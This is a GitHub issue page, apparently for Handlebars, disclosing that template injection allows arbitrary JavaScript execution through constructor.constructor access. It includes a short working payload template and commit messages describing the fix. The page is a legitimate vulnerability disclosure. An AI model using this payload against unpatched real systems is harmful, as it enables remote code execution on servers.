Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Javascript execution from template #1267

Closed
cryptoad opened this issue Nov 3, 2016 · 3 comments
Closed

Javascript execution from template #1267

cryptoad opened this issue Nov 3, 2016 · 3 comments
Labels

Comments

@cryptoad
Copy link

cryptoad commented Nov 3, 2016

It is possible to execute Javascript from a template without registering any helper/partial/whatever or having any function in the context. I am not sure if you guys care about this, but it probably is not ideal in the event of a template injection. Anyway, it makes the logicless aspect less logicless.

Here is a sample that would execute whatever is in the initial string (eg: alert(1)) without anything extra registered:

{{#with 'alert(1)|'}}
{{#with (split '|' 1)}}
{{#> p constructor.constructor}}
{{> (apply 0 ../this)}}
{{/p}}
{{/with}}
{{/with}}

I'd venture and say that it could be fixed by making sure that only "own" properties of the helpers/etc dictionaries can be accessed instead of their prototypes' ones as well.

@lawnsea
Copy link
Collaborator

lawnsea commented Nov 23, 2016

This seems like a bug.

@lawnsea lawnsea added the bug label Nov 23, 2016
nknapp added a commit that referenced this issue Feb 7, 2019
This commit fixes a Remote Code Execution (RCE) reported by
npm-security. Access to non-enumerable "constructor"-properties
is now prohibited by the compiled template-code, because this
the first step on the way to creating and execution arbitrary
JavaScript code.
The vulnerability affects systems where an attacker is allowed to
inject templates into the Handlebars setup.
Further details of the attack may be disclosed by npm-security.

Closes #1267
Closes #1495
nknapp added a commit that referenced this issue Feb 7, 2019
This commit fixes a Remote Code Execution (RCE) reported by
npm-security. Access to non-enumerable "constructor"-properties
is now prohibited by the compiled template-code, because this
the first step on the way to creating and execution arbitrary
JavaScript code.
The vulnerability affects systems where an attacker is allowed to
inject templates into the Handlebars setup.
Further details of the attack may be disclosed by npm-security.

Closes #1267
Closes #1495
@nknapp nknapp closed this as completed in edc6220 Feb 17, 2019
@hady2
Copy link

hady2 commented Feb 18, 2019

Merged #1501 into 4.x.

@nknapp
Copy link
Collaborator

nknapp commented Feb 19, 2019

@hady2 I don't understand your comment. Could you explain?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

4 participants